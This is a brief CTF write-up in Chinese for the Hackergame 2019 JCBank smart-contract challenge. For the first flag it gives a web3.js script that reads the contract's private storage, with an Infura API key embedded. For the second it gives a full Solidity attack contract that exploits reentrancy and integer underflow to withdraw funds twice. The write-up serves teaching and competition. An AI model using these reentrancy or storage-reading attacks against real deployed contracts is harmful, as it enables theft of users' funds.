Hackergame2019_JCBank

Hackergame2019 JCBank

Analysis

  • 两个 flag :

    • get_flag_1
    • get_flag_2
  • get_flag_1 读取 storage 变量 secret 的值即可,其位于 slot 0 的位置,其值为 0x175bddc0da1bd47369c47861f48c8ac ,调用 get_flag_1 即可

var Web3=require("web3");
if (typeof web3 !== 'undefined') {
    web3 = new Web3(web3.currentProvider);
} else {
    web3 = new Web3(new Web3.providers.HttpProvider("https://kovan.infura.io/v3/b38f10b5036f4e6691fcc690461097d1"));
}

var address="0xE575c9abD35Fa94F1949f7d559056bB66FddEB51";
web3.eth.getStorageAt(address, 0, function(x,y){console.info(y)});
web3.eth.getStorageAt(address, 1, function(x,y){console.info(y)});
web3.eth.getStorageAt(address, 2, function(x,y){console.info(y)});
  • get_flag_2 利用 Reentrancy整型下溢
contract hack {
    address instance_address = 0xE575c9abD35Fa94F1949f7d559056bB66FddEB51;
    JCBank target = JCBank(instance_address);
    uint public have_withdraw = 0;
    string public s;

    constructor() public payable {}

    function attack() public {
        target.deposit.value(0.1 ether)();
    }

    function attack1(uint128 guess) public {
        s=target.get_flag_1(guess);
    }

    function attack2() public {
        if(have_withdraw == 1){
            target.get_flag_2(155418233698);
        }
    }

    function attack3() public {
        target.withdraw(0.1 ether);
    }

    function() payable {
        if (have_withdraw == 0 && msg.sender == instance_address){
            have_withdraw = 1;
            target.withdraw(0.1 ether);
        }
    }
}
  • attack 存入一点金额,attack3 重入攻击两次, attack2 调用 get_flag_2 即可